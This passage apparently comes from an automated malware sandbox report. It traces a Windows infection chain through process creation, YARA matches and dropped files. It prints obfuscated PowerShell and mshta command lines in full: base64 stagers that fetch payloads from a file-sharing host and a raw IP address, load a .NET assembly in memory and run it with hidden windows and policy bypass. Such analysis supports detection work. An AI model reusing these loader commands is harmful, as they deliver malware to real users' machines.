XVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"Jump to behavior
                Source: Yara matchFile source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_031736C8 push ebx; iretd 1_2_031736DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04630A68 push edx; iretd 9_2_04630A72
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04630B25 push ebp; iretd 9_2_04630B2A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04631BED pushad ; iretd 9_2_04631BF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402AC0 push eax; ret 13_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402AC0 push eax; ret 13_2_00402AFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dllJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
